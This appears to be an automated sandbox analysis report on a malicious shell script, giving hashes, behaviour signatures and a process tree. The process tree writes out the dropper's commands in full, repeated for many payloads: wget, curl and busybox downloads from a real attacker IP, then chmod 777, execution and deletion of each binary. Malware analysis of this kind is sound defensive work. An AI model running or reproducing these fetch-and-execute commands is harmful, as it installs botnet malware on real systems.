Analysis
-
max time kernel
138s -
max time network
141s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:41
Static task
static1
Behavioral task
behavioral1
Sample
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh
-
Size
10KB
-
MD5
7dd08d391852a034adb552d4b1b5d459
-
SHA1
11f80e7b474a9792b56a4060a6ac1a585c2edaf4
-
SHA256
c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d
-
SHA512
958707536d7efa917ae120a774ab7d0a4c635968729f07da4bf3a7a2f3ca3a9640293e51d3d72044ee0d3153b3e85bf7db38cbb187bb2e0fcb7308be42e2f62c
-
SSDEEP
192:4kwD4AJoNx9g3j4rzMImYpNuFtOV3j4rzQjpNuFtCOkwD4AWn:4kwD4AJoNx9YImeYkwD4AWn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 725 chmod 825 chmod 879 chmod 915 chmod 748 chmod 897 chmod 909 chmod 957 chmod 963 chmod 793 chmod 927 chmod 933 chmod 813 chmod 873 chmod 903 chmod 945 chmod 969 chmod 951 chmod 772 chmod 865 chmod 885 chmod 891 chmod 921 chmod 735 chmod 741 chmod 819 chmod 845 chmod 939 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 727 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 736 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 742 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 750 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 773 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 795 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 814 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 820 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 826 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 846 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 867 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 874 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 880 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 886 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 892 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 898 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 904 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 910 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 916 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 922 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 928 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 934 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 940 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 946 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 952 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 958 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 964 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 970 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl
Processes
-
/tmp/c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh/tmp/c4feb92033161dccd559e5f67f340612d9d7b980b05053711fdb41afc8f3be8d.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:723
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:734
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:740
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:746
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:769
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:789
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:811
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:818
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:824
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:842
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:863
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:872
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:878
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:884
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:890
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:896
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:902
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:908
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:914
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:920
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:926
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:927
-
-
